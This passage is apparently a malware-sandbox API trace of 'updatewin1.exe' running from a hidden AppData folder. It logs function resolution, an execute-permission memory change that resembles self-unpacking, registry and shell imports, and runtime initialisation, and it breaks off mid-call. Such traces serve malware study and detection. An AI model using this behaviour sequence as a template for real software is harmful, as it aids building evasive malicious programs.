0x76d41856 [0129.390] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualProtect") returned 0x76d4435f [0129.390] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0129.390] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0129.390] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0129.390] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0129.390] GetProcAddress (hModule=0x76d30000, lpProcName="SetErrorMode") returned 0x76d41b00 [0129.390] SetErrorMode (uMode=0x400) returned 0x0 [0129.390] SetErrorMode (uMode=0x0) returned 0x400 [0129.390] GetVersionExA (in: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x65006564, dwMinorVersion=0x7373, dwBuildNumber=0x2, dwPlatformId=0xffffffff, szCSDVersion="s}Çw") | out: lpVersionInformation=0x18e550*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0129.390] VirtualAlloc (lpAddress=0x0, dwSize=0x2d200, flAllocationType=0x1000, flProtect=0x4) returned 0x1a0000 [0129.394] VirtualProtect (in: lpAddress=0x400000, dwSize=0x32000, flNewProtect=0x40, lpflOldProtect=0x18f5d8 | out: lpflOldProtect=0x18f5d8*=0x2) returned 1 [0129.497] VirtualFree (lpAddress=0x1a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0129.498] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76d30000 [0129.498] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0129.499] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0129.499] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0129.499] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0129.499] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessA") returned 0x76d41072 [0129.499] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyW") returned 0x76d63102 [0129.499] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0129.499] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0129.547] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0129.547] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0129.547] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0129.547] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0129.547] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0129.547] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0129.547] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0129.547] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0129.547] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcatA") returned 0x76d62b7a [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpyA") returned 0x76d62a9d [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetShortPathNameA") returned 0x76d6594d [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0129.548] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0129.549] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeSListHead") returned 0x77c794a4 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0129.550] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0129.551] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0129.552] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0129.552] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0129.552] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileExW") returned 0x76d51811 [0129.552] GetProcAddress (hModule=0x76d30000, lpProcName="FindNextFileW") returned 0x76d454ee [0129.552] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0129.552] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0129.552] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0129.552] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0129.552] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExW") returned 0x777240fe [0129.552] GetProcAddress (hModule=0x77710000, lpProcName="SetSecurityDescriptorDacl") returned 0x7772415e [0129.552] GetProcAddress (hModule=0x77710000, lpProcName="InitializeSecurityDescriptor") returned 0x77724620 [0129.552] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0129.552] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0129.553] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0129.553] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0129.553] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0129.553] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x772f0000 [0129.553] GetProcAddress (hModule=0x772f0000, lpProcName="PathAppendW") returned 0x773081ef [0129.553] GetProcAddress (hModule=0x772f0000, lpProcName="PathFileExistsA") returned 0x7732ad1a [0129.553] GetProcAddress (hModule=0x772f0000, lpProcName="PathRemoveFileSpecW") returned 0x77303248 [0129.553] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0129.557] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0129.557] atexit (param_1=0x2b63d8) returned 0 [0129.558] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f5dc | out: lpSystemTimeAsFileTime=0x18f5dc*(dwLowDateTime=0xc2cae670, dwHighDateTime=0x1d62438)) [0129.559] GetCurrentThreadId () returned 0x3c4 [0129.559] GetCurrentProcessId () returned 0x5b0 [0129.559] QueryPerformanceCounter (in: lpPerformanceCount=0x18f5d4 | out: lpPerformanceCount=0x18f5d4*=24996217761) returned 1 [0129.576] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0129.577] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.577] GetLastError () returned 0x57 [0129.656] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.656] GetLastError () returned 0x57 [0129.656] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0129.656] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0129.656] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.656] GetLastError () returned 0x57 [0129.656] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0129.657] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0129.659] LoadLibraryExW (lpLibFileName="api-ms-win-core-synch-l1-2-0", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.659] GetLastError () returned 0x57 [0129.659] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.659] GetLastError () returned 0x57 [0129.659] LoadLibraryExW (lpLibFileName="kernel32", hFile=0x0, dwFlags=0x0) returned 0x76d30000 [0129.659] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0129.660] GetProcessHeap () returned 0x2a0000 [0129.660] LoadLibraryExW (lpLibFileName="api-ms-win-core-fibers-l1-1-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.660] GetLastError () returned 0x57 [0129.660] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0129.660] GetLastError () returned 0x57 [0129.660] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0129.660] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0x364) returned 0x2ca9e8 [0129.660] SetLastError (dwErrCode=0x57) [0129.662] RtlAllocateHeap (HeapHandle=0x2a0000, Flags=0x8, Size=0xc00) returned 0x2cad58 [0129.664] GetStartupInfoW (in: lpStartupInfo=0x18f510 | out: lpStartupInfo=0x18f510*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4033b0, hStdOutput=0x12a162b4, hStdError=0xfffffffe)) [0129.664] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0129.664] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0129.664] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0129.664] GetCommandLineA () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" " [0129.664] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\f2685878-c1d9-47fc-b7a6-e4dee8a92594\\updatewin1.exe\" " [0129.664] IsValidCodePage (CodePage=0x4e4) returned 1 [0129.664] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f530 | out: lpCPInfo=0x18f530) returned 1 [0129.664] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18edf8 | out: lpCPInfo=0x18edf8) returned 1 [0129.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.664] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb98, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0129.664] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ee0c | out: lpCharType=0x18ee0c) returned 1 [0129.665] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.665] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb48, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā") returned 256 [0129.665] LoadLibraryExW (lpLibFileName="api-ms-win-core-localization-l1-2-1", hFile=0x0, dwFlags=0x800) returned 0x0 [0129.665] GetLastError () returned 0x57 [0129.666] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0129.666] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0129.666] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ굧@Ā", cchSrc=256, lpDestStr=0x18e938, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ") returned 256 [0129.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȈ", cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿlÇø\x12Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0129.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0129.666] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0129.666] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0129.666] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0129.666] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, 